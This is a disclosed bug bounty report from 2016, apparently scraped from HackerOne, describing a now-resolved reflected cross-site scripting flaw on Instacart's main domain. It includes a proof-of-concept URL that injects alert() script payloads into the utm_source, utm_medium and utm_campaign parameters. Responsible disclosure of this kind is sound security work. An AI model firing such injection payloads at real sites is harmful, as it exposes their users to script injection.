Cross-Site Scripting Reflected On Main Domain

Disclosed: 2016-09-30 11:15:32 By hussain_0x3c To instacart

Unknown

Vulnerability Details

**Hi** Security Team instacart I'm Found Have Vulnerability Cross-Site Scripting Reflected on Main Domain in Variable **utm_source** POC --- https://www.instacart.com/green-zebra-grocery?utm_source=>"'><script>alert(/Hussain/)</script>&utm_medium=>"'><script>alert(/XSS/)</script>&utm_campaign=>"'><script>alert(/injection/)</script> **Img** :- http://i.imgur.com/wSn4EU7.jpg Test :- FF - IE **Regards** @Hussain

Actions

View on HackerOne

Report Stats

Report ID: 104917
State: Closed
Substate: resolved
Upvotes: 19

Cross-Site Scripting Reflected On Main Domain

Vulnerability Details

Actions

Report Stats

Share this report